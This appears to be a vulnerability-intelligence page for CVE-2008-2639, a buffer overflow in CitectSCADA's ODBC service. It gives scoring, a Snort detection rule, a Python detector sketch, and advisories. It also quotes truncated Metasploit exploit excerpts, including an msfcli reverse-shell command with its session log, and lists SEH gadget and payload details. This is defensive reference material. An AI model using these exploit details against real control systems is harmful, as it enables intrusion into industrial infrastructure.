CVE-2008-2639
Published 2008-06-16
CVSS 2.0: 7.6 (high), vector AV:N/AC:H/Au:N/C:C/I:C/A:C
Exploit available
EPSS: 77.72% (99.5th percentile)
Stack-based buffer overflow in the ODBC server service in Citect CitectSCADA 6 and 7, and CitectFacilities 7, allows remote attackers to execute arbitrary code via a long string in the second application packet in a TCP session on port 20222.
Affected (3 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| citect | citectfacilities | — | — |
| citect | citectscada | — | — |
| citect | citectscada | — | — |
Detection & IOCs (extracted from sources)
Snort rule:
alert tcp $EXTERNAL_NET any -> $HOME_NET 20222 (msg:"ET SCADA CitectSCADA ODBC Overflow Attempt"; flow:established,to_server; dsize:4; byte_test:4,>,399,0; reference:cve,2008-2639; reference:url,www.digitalbond.com/index.php/2008/09/08/ids-signature-for-citect-vuln/; reference:url,digitalbond.com/tools/quickdraw/vulnerability-rules; classtype:attempted-user; sid:2008542; rev:8; metadata:created_at 2010_07_30, cve CVE_2008_2639, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_07_26;)
- The exploit sends two TCP packets to port 20222: first a 4-byte length prefix, then the malicious ODBC payload. Detection should look for an initial 4-byte packet with a value greater than 399 on port 20222 (as captured by the ET rule's dsize:4 + byte_test).
- The overflow is triggered in the second application packet of the TCP session on port 20222. The packet begins with a 5-byte header (0x02 + 4-byte big-endian length) followed by the oversized payload string.
- The exploit uses a null-byte-free payload (BadChars: \x00) with a stack adjustment of -3500 bytes and SEH-based exploitation via pop/pop/ret gadgets in CiExceptionMailer.dll or Citect32.exe.
- The EXITFUNC is set to 'thread', meaning the shellcode exits via thread termination, which is useful for distinguishing exploit payloads from benign traffic.
- The ET Snort rule (sid:2008542) triggers only on the initial 4-byte length packet (dsize:4, value >399) and will not fire on the actual payload packet. This may miss variants that send a combined packet.
- Return addresses (ROP gadgets) vary significantly by Citect version and OS. CiExceptionMailer.dll can be arbitrarily remapped by other DLLs, making static RET address detection unreliable across environments.
- The vulnerability affects CitectSCADA 6 and 7 and CitectFacilities 7, but the Metasploit module was also tested against v5. Patched status of v7+ is noted as 'presumably patched' but not confirmed for all sub-versions.
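To make the segmentation caveat above concrete, here is an added Python sketch (not from the ET rule set or any of the sources indexed here) that models the sid:2008542 condition beside a reassembled-stream check built on the framing described above. The sample sessions are constructed, and the assumption that the 4-byte prefix announces the length of the following packet is mine, not stated by the sources.

```python
import struct

# Threshold taken from the ET rule: byte_test:4,>,399,0 (sid:2008542).
LENGTH_THRESHOLD = 399
CITECT_ODBC_PORT = 20222  # port the rule is bound to; informational only here


def et_rule_fires(segment: bytes) -> bool:
    """Model the ET rule: dsize:4 and a big-endian 4-byte value greater than 399.

    Only a segment that is exactly 4 bytes long can match, which is the gap
    for sessions that send prefix and payload in one segment.
    """
    return len(segment) == 4 and struct.unpack("!I", segment)[0] > LENGTH_THRESHOLD


def stream_alert(stream: bytes) -> bool:
    """Segmentation-independent check over the reassembled to_server stream.

    Assumed framing (from the description above): a 4-byte big-endian length
    prefix, then a 0x02 byte and a second 4-byte big-endian length, then the
    application string. Alert if either declared length exceeds the threshold.
    """
    if len(stream) < 9 or stream[4] != 0x02:
        return False
    prefix_len = struct.unpack("!I", stream[:4])[0]
    header_len = struct.unpack("!I", stream[5:9])[0]
    return prefix_len > LENGTH_THRESHOLD or header_len > LENGTH_THRESHOLD


def analyze_session(segments: list) -> dict:
    """Run both checks over the to_server segments of one TCP session."""
    return {
        "et_rule_fired": any(et_rule_fires(s) for s in segments),
        "stream_alert": stream_alert(b"".join(segments)),
    }


def build_session(string_len: int, combined: bool) -> list:
    """Constructed sample session (not captured traffic) carrying a
    string of `string_len` filler bytes; `combined` merges the length
    prefix and the application packet into a single TCP segment."""
    body = b"\x02" + struct.pack("!I", string_len) + b"A" * string_len
    prefix = struct.pack("!I", len(body))  # assumption: prefix = next packet length
    return [prefix + body] if combined else [prefix, body]


if __name__ == "__main__":
    for n, combined in ((64, False), (1000, False), (1000, True)):
        print(n, "combined" if combined else "split", analyze_session(build_session(n, combined)))
```

The split 1000-byte session trips both checks, the combined one trips only the stream check, and the 64-byte session trips neither; this is the rule gap the bullet above describes.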
GHSA
GHSA-3mhh-v2cc-54m6 (unreviewed, 2022-05-01) · CVE-2008-2639 [HIGH] · CWE-119
Stack-based buffer overflow in the ODBC server service in Citect CitectSCADA 6 and 7, and CitectFacilities 7, allows remote attackers to execute arbitrary code via a long string in the second application packet in a TCP session on port 20222.
CISA ICS
GLEG Agora SCADA+ Exploit Pack (ICS Advisory, Alert Code ICSA-11-096-01, last revised September 06, 2018)
## OVERVIEW
On March 15, 2011, GLEG Ltd. announced the Agora SCADA+ Exploit Pack for Immunity's CANVAS system. CANVAS is a penetration testing framework that is extensible using CANVAS Exploit Packs. On March 25, 2011, GLEG announced it would be adding exploits for the 35 vulnerabilities released by Luigi Auriemma on March 21, 2011. The ICS-CERT has not received any reports of this tool being used for an unauthorized compromise of an actual control system installation.
ICS-CERT has prepared t
Suricata
ET SCADA CitectSCADA ODBC Overflow Attempt (2010-07-30)
Rule: identical to the ET rule (sid:2008542) listed under Detection & IOCs.
Exploit-DB
CitectSCADA/CitectFacilities ODBC - Remote Buffer Overflow (Metasploit) (exploitdb, 2010-11-14)
---
##
# $Id: citect_scada_odbc.rb 11039 2010-11-14 19:03:24Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'CitectSCADA/CitectFacilities ODBC Buffer Overflow',
      'Description' => %q{
        This module exploits a stack buffer overflow in CitectSCADA's ODBC daemon.
        This has only been tested against Citect v5, v6 and v7.
      },
      'Author'      =>
        [
          'KF ',     # Original Metasploit module
          'patrick', # Some clean up - I'm sure there's more to be done :)
        ],
      'Version'     => '$Revision: 11039
Exploit-DB
CitectSCADA ODBC Server - Remote Stack Buffer Overflow (Metasploit) (exploitdb, 2008-09-05, CVSS 7.6, CVE-2008-2639 [HIGH])
---
##
# $Id: citect_scada_odbc.rb
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
#
#
# msfcli exploit/windows/misc/citect_scada_odbc RHOST=192.168.2.45 PAYLOAD=windows/shell/reverse_ord_tcp LHOST=192.168.2.101 TARGET=2 E
# [*] Started reverse handler
# ...
# [*] Sending stage (474 bytes)
# [*] Command shell session 1 opened (192.168.2.101:4444 -> 192.168.2.45:1039)
#
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Citect\CitectSCADA\Bin>
#
# Arbi
Metasploit
CitectSCADA/CitectFacilities ODBC Buffer Overflow
This module exploits a stack buffer overflow in CitectSCADA's ODBC daemon. This has only been tested against Citect v5, v6 and v7.
No writeups or analysis indexed.